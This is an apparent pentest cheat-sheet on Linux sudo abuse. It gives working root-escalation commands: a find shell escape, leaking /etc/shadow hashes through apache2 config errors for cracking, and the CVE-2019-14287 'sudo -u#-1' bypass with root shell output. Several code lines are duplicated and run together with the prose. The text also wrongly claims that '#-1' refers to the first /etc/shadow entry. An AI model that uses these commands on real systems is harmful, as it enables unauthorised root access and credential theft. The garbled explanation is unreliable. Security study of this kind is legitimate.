Sudo Abuse
running sudo without password is one of the most dangerous things in linux. we can use sudo to run binaries and apps that are vulnerable to shell escape sequence and use them to get a root shell.
GTFObins is a great resource for linux privilege escalation and will help you find vulnerable binaries and methods to use them.
sudo -l >>> see what executable binaries in the system we can use with sudo
for example we search for find command in the web page to see how we can use it to abuse sudo
we can use this for prives
sudo find . -exec /bin/sh \; -quit
sudo find . -exec /bin/sh \; -quitanother example would be apache2 which we can ru usung sudo but it doesnt have an scape sequence to abuse
but there are other methods for this for example apache2 will return an error while parsing a configuration file when it doesnt understand it and it will print out any line of the given file
sudo apache2 -f /etc/shadow
sudo apache2 -f /etc/shadowapache wont understand the /etc/shadow file entries as a config file so it will print out any line that it doesnt understand which will be the root hashed password
we can now copy and crack the root hash
CVE-2019-14287
In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u #$((0xffffffff))" command.
the exploit code can be found here.
Check for the user sudo permissions
sudo -l
sudo -lUser hacker may run the following commands on kali:
(ALL, !root) /bin/bash
(ALL, !root) /bin/bashSo user hacker can't run /bin/bash as root (!root)
User hacker sudo privilege in /etc/sudoers
# User privilege specification root ALL=(ALL:ALL) ALL
# User privilege specification root ALL=(ALL:ALL) ALLhacker ALL=(ALL,!root) /bin/bash
hacker ALL=(ALL,!root) /bin/bashWith ALL specified, user hacker can run the binary /bin/bash as any user
Exploit
sudo -u#-1 /bin/bash → #-1 means the the first entry of the /etc/shadow file (root) so we can specify any user ID with a + like: #+1000
Example :
hacker@kali:~$ sudo -u#-1 /bin/bash root@kali:/home/hacker# id
hacker@kali:~$ sudo -u#-1 /bin/bash root@kali:/home/hacker# id uid=0(root) gid=1000(hacker) groups=1000(hacker)
uid=0(root) gid=1000(hacker) groups=1000(hacker) root@kali:/home/hacker#
root@kali:/home/hacker#Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv -u#-1 returns as 0 which is root's id and /bin/bash is executed with root permission Proof of Concept Code :
python3 sudo_exploit.py
python3 sudo_exploit.pyLast updated
